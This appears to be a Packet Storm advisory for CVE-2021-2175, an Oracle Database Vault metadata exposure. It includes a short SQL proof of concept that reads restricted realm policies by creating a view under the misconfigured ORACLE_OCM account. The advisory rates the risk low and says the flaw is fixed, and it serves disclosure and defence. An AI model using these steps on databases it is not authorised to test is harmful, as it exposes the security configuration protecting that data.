exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Database Vault Metadata Exposure

Oracle Database Vault Metadata Exposure
Posted Jan 5, 2023
Authored by Emad Al-Mousa

Oracle Database versions 12.1.0.2, 12.2.0.1, 18c, and 19c suffer from a vault metadata exposure vulnerability.

tags | exploit
advisories | CVE-2021-2175
SHA-256 | 6d636ac988e2da4e604986a058092a2597791439751bb9ff71e51d032dd50eef

Oracle Database Vault Metadata Exposure

Change Mirror Download

Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure Vulnerability
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
CVE Reference: CVE-2021-2175
Author of Advisory: Emad Al-Mousa

Overview:

Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.


*****************************************
Vulnerability Details:

Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].

*****************************************
Proof of Concept (PoC):

The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.

Access the database as SYS account:

sqlplus / as sysdba

SQL> SELECT * FROM DBA_DV_REALM;

ERROR at line 1:

ORA-01031: insufficient privileges

// as expected SYS account can't view the database view contents.....However...let us do the following:

SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;

SQL> select * from ORACLE_OCM.DUMMY_V;

// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.

*****************************************
References:
https://www.oracle.com/security-alerts/cpuapr2021.html
https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175


Credit:
Emad Al-Mousa: CVE-2021-35576

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close